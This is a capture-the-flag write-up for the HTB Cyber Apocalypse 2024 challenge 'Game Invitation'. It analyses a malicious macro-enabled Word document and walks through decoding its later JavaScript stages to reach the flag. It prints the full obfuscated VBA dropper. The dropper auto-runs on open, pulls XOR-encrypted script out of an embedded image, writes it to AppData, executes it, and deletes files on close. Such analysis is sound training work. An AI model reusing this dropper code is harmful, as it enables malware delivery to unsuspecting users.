HTB Cyber Apocalypse 2024: Hacker Royale - Game Invitation
In the bustling city of KORP™, where factions vie in The Fray, a mysterious game emerges. As a seasoned faction member, you feel the tension growing by the minute. Whispers spread of a new challenge, piquing both curiosity and wariness. Then, an email arrives: “Join The Fray: Embrace the Challenge.” But lurking beneath the excitement is a nagging doubt. Could this invitation hide something more sinister within its innocent attachment?
- Difficulty: hard
- Creator:
- Files:
- Docker: no
- Tags:
- Points:
- Number of solvers:
Initial analysis
We got a .docm
file which is a macro enabled Word document.
Using the olevba
tool, we can get the source code of the macro (macro.vb
Public IAiiymixt As String
Public kWXlyKwVj As String
Function JFqcfEGnc(given_string() As Byte, length As Long) As Boolean
Dim xor_key As Byte
xor_key = 50
For i = 0 To length - 1
given_string(i) = given_string(i) Xor xor_key
xor_key = ((xor_key Xor 99) Xor (i Mod 254))
Next i
JFqcfEGnc = True
End Function
Sub AutoClose()
On Error Resume Next
Kill IAiiymixt
On Error Resume Next
Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
aMUsvgOin.DeleteFile kWXlyKwVj & "\*.*", True
Set aMUsvgOin = Nothing
End Sub
Sub AutoOpen()
On Error GoTo MnOWqnnpKXfRO
Dim chkDomain As String
Dim strUserDomain As String
chkDomain = "GAMEMASTERS.local"
strUserDomain = Environ$("UserDomain")
If chkDomain <> strUserDomain Then
Dim gIvqmZwiW
Dim file_length As Long
Dim length As Long
file_length = FileLen(ActiveDocument.FullName)
gIvqmZwiW = FreeFile
Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW
Dim CbkQJVeAG() As Byte
ReDim CbkQJVeAG(file_length)
Get #gIvqmZwiW, 1, CbkQJVeAG
Dim SwMbxtWpP As String
SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode)
Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
Set vTxAnSEFH = CreateObject("vbscript.regexp")
vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)
Dim Y5t4Ul7o385qK4YDhr
If I4j833DS5SFd34L3gwYQD.Count = 0 Then
GoTo MnOWqnnpKXfRO
End If
For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
Exit For
Dim Wk4o3X7x1134j() As Byte
Dim KDXl18qY4rcT As Long
KDXl18qY4rcT = 13082
ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
Get #gIvqmZwiW, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
If Not JFqcfEGnc(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
GoTo MnOWqnnpKXfRO
End If
kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows"
Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then
kWXlyKwVj = Environ("appdata")
End If
Set aMUsvgOin = Nothing
Dim K764B5Ph46Vh
K764B5Ph46Vh = FreeFile
IAiiymixt = kWXlyKwVj & "\" & "mailform.js"
Open (IAiiymixt) For Binary As #K764B5Ph46Vh
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
Close #K764B5Ph46Vh
Erase Wk4o3X7x1134j
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
Exit Sub
Close #K764B5Ph46Vh
End If
End Sub
If we clean up the macro we can figure out the following functionalities (macro-cleaned.vb
- If we open the document the
subroutine will start - It check the domain of the machine (
) - It reads the bytes of the document (which is currently opened) into memory
- Searches for a Base64-like string in the document (
) - It gets some part of the
file - Reads 13082 bytes after the string is found
- Decrypts the read bytes using XOR-based algorithm
- Saves the result in the
folder asmailfrom.js
- Executes the
file with an argument (vF8rdgMHKBrvCoCp0ulm
If we search for the sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa
string in the docm
document, we can identify that the image1.jpg
in the document contains it around 0x0001d5e0
The macro basically gets the bytes of the image located after the random string, which is exactly 13082
If we run the XOR decryption reimplemented in Python (
), it gives gibberish, not valid JavaScript code, but if we brute-force the first byte (xor_key
) and at 45, we get a valid JS code (mailform.js
Second stage (mailfrom.js
If we clean up the code a little bit ((mailfrom-cleaned.js
)[files/mailfrom-cleaned.js]) At the beginning, the 5th statement is an eval
var lVky=WScript.Arguments;
var DASz=lVky(0);
var Iwlh=lyEK();
We can execute the JS code until eval
in a browser, we just need the argument from the macro: vF8rdgMHKBrvCoCp0ulm
Third stage
The result is another JS code, which has the flag as Base64 in the Cookie
header (final.js
Flag: HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}